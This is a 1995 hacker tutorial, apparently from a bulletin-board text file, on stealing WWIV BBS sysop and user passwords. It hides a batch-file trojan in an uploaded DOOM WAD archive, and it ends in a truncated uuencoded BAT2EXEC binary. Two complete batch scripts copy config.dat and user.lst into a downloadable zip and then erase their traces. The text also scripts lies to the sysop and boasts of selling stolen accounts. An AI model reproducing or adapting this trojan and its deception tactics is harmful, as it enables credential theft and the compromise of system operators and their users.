Subject: HOW TO HACK WWIV (UPDATE) Hacking passwords out of WWIV software really isn't that difficult. All you have to do is write a *.com file to do it all for you. Here is the way I like to do it: Before we begin you should find some sort of file you want to upload onto the WWIV BBS. I usually use a DOOM or DOOM2 *.WAD file because everyone loves DOOM and there are so many files that usually noone notices a new one. What you'll want to do is create a *.TXT file for your *.WAD file (usually they come with the WAD file) which describes the external level. At the bot- tom of the file you'll want to edit it to say that this WAD file has been password protected to keep from being modified, but that there is a COM file included that <> be run if it is to be uploaded onto a BBS for others to download. Now it is time to write a batch file. You'll also want to make some B.S. by E-mailing the Sysop that even if they don't have DOOM2 that this file <> be in a directory called DOOM2. <> To write a Batch file (*.BAT) all you need is the EDIT command at the DOS prompt. Call the file whatever the name of the WAD is. EX: Maze.bat. Now you will want to type in what you want the batch file to do. Here is the way that I do it: @echo off copy c:\wwiv\config.dat c:\wwiv\maze1.txt attrib -r c:\wwiv\maze1.txt pkzip c:\doom2\ -a c:\wwiv\maze1.txt del c:\wwiv\maze1.txt copy c:\wwiv\data\user.lst c:\wwiv\data\mazedoc.txt attrib -r c:\wwiv\data\mazedoc.txt pkzip c:\doom2\ -a c:\wwiv\data\mazedoc.txt del c:\wwiv\data\mazedoc.txt pkzip c:\doom2\ -d del cd\doom2 doom2 -file maze.wad The first line makes it so the person who's files you are going to hack can't see the commands the BATCH file is doing. The second line makes a copy of the CONFIG.DAT file in the WWIV directory so you can download it. This file contains the SYSTEM PASSWORD which is needed to gain SYSOP access to the BBS...REMEMBER: This program hacks the files on the person's computer on which the BBS is located to give you the account names and passwords. The third line removes the READ ONLY attribute to the copy of the CONFIG.DAT file so you can delete it later. The forth line puts the new CONFIG.DAT file into the original *.ZIP file that you uploaded to the BBS. This is where the need for telling the SYSOP that when they see PKZIP running that all it is doing is removing the password protection on the *.zip file. If you don't tell them this, they will get curios as to why PKZIP was running and they may find you out. The fifth line deletes the copy of the CONFIG.DAT file you made. The sixth - ninth line are doing much of the same thing as the second through fifth line only this time it is retreaving the file with the USER pas- swords and account names. The tenth line removes the *.com file from the original *.zip file you uploaded so that other BBS users cannot see what you did if they also download the file. The eleventh line deletes the *.com file that is running all this. The twelvth through thirteenth lines just run DOOM2 with the new WAD file running. If the Sysop doesn't have DOOM2 that's ok and the program will just end after the eleventh line. To make this BATCH file into a COM file you are going to need a program called BAT2EXEC.COM. It has been included at the bottom. You don't have to do this, but if the sysop decides to look at the BATCH file before they run it...You're Screwed!!! Ok. Now that you have the *.com file written and modified to your specific file zip the files *.WAD, *.TXT, and *.COM file into the file that you specified in your COM file. Now just upload the file and E-mail the sysop all the crap about the file needs to be run like this and that. NOTE: Tell the sysop to unzip the file in their DOOM2 directory and then run the COM file. After they run it just put the original *.zip file on the BBS for others to download. If you get a chance to upload the file to a directory other than SYSOP than check the file to see how big it is before you leave the BBS. Reme- mber that number and check the file everynow and again to see if it has increased in size. If it has, download it and use a HEX editor to read the files that the *.com file retrieved from the WWIV system. After you get the file reupload the WAD file and tell the SYSOP to delete the old zipped file and to replace it with this newer (yea right) version of the file. This way, no one else can download the file and also get all the passwords. That's it. Have Phun. This works almost everytime if you do it right. After I get all the passwords, I like selling certain account names and numbers to my friends... Cha-Ching!!! Ok. Ok. I'll tell you how to do it without having to tell the sysop to make sure that pkzip is in their DOS directory. First upload Pkzip to the BBS. Remember the name of the area you uploaded it to. If the name of the area is COMPRESSION then on the person's computer to whom the files are on the directory which contains those files is probably called COMPRESSION or COMP. Note: Because you have to guess at the name of the directory, this is not a sure fire way. Next, find a zipped file somewhere on the BBS, preferably on that is in the same directory as the PKZIP.EXE file. Now you're going to have to write another BATCH file...(YEA). Here is the way I did it: @echo off cd\wwiv copy config.dat trog.txt attrib trog.txt -r cd\wwiv\dloads\upload pkzip -a c:\wwiv\trog.txt cd\wwiv del trog.txt cd\wwiv\data copy user.lst trog.doc attrib -r trog.doc cd\wwiv\dloads\upload pkzip -a c:\wwiv\data\trog.doc cd\wwiv\data del trog.doc cd\wwiv\dloads\upload kewl I'm not going to explain this can probably figure it out. The way to do this tecnique is to write (or get for you non-program- ming literate) a stupid little program. <<>> I wrote a program called "KEWL" hence the last line of the BATCH file. I also called the BATCH file (which I turned into a COM file) "KEWL.COM". I then uploaded these file onto a WWIV BBS and gave the SYSOP crap about how the only way to run the file "KEWL.EXE" I uploaded, was to use the COM file. Oh yea. One more thing. In the BATCH file above, TROG.ZIP is the zipped file that I chose to put the neccasary file in. One last thing. After you download the file with the files in it...since you didn't originally upload it there is no "upgrade" right...WRONG...just upload something with the same file name (or slightly different like TROG2.ZIP) and tell the sysop to delete the old one. Who cares if its the real thing or not. MS El Queso Es Vejo y Podrido...Donde Esta El Bao? I can be reached at Disclamer: MS claims absolutly NO respnsibility for getting caught... don't blame me for your stupidity... Copyright 1995 Cd Pw Inc. The following is the file BAT2EXEC.COM...It has been unencode it you will need wither wincode or uudecode...if you don't know how to decode this once you have the are stupid... section 1 of uuencode 5.21 of file begin 644 MZ4%\D,2XA(2$```!47DU>4%\D,BXA(2$`C!L`!/__```N0T]-`"`@("`@ M("`@("`@("`-"D5R'0-"B1#86XG="!F M:6YD(&EN<'5T(&9I;&4D3F]T(&5N;W5G:"!M96UO"!E_B`/SI+J"`^G%`/.D*Q9/`B:)EA@`N``!`\Q195`BZ+#ED"*\K- M(1^T/LTA,L!0M$DNC@9-`LTABQZ'`H/[_W4$M#[-(5BT3,TA#A^#/HD"`'04 M4KJ=`NCC"*&)`NCR"+K,`^C7"%KHW`BP`>O`NPX`B@0\.G0ANPP`/"5T&HM$ M`3PZ=0B[#`"`_"!V"^A>`%>_6@'H&0!?4X/["'<(LP'H.!PQ`" M_Q?#408.!S/2"]%T(C/;5HO*\Z9>=06`/0!T&D,RP#A%_W4!3[D*`/*N@#T` M=>"[#0#Y!UG#@_L,<@.[#`#XZ_)0,\#K`U"T`5=6!AX'B_XSR:P\('8-Z`\` M7UC#/&%R"3QZ=PXDW_CK"3Q:=P0\07/U^<.`/EP"`'00 MQ@9<`@"[7AGHO@C;!H`^70(`=!#&!ET"`+L-&>BG!S/)Z,0&@#YA`@!T M%8L67P*Y`0"[@!GHC@?HK0;&!F$"`(`^9`(`=!F+%F(",]LSP.CR`,8&80(! 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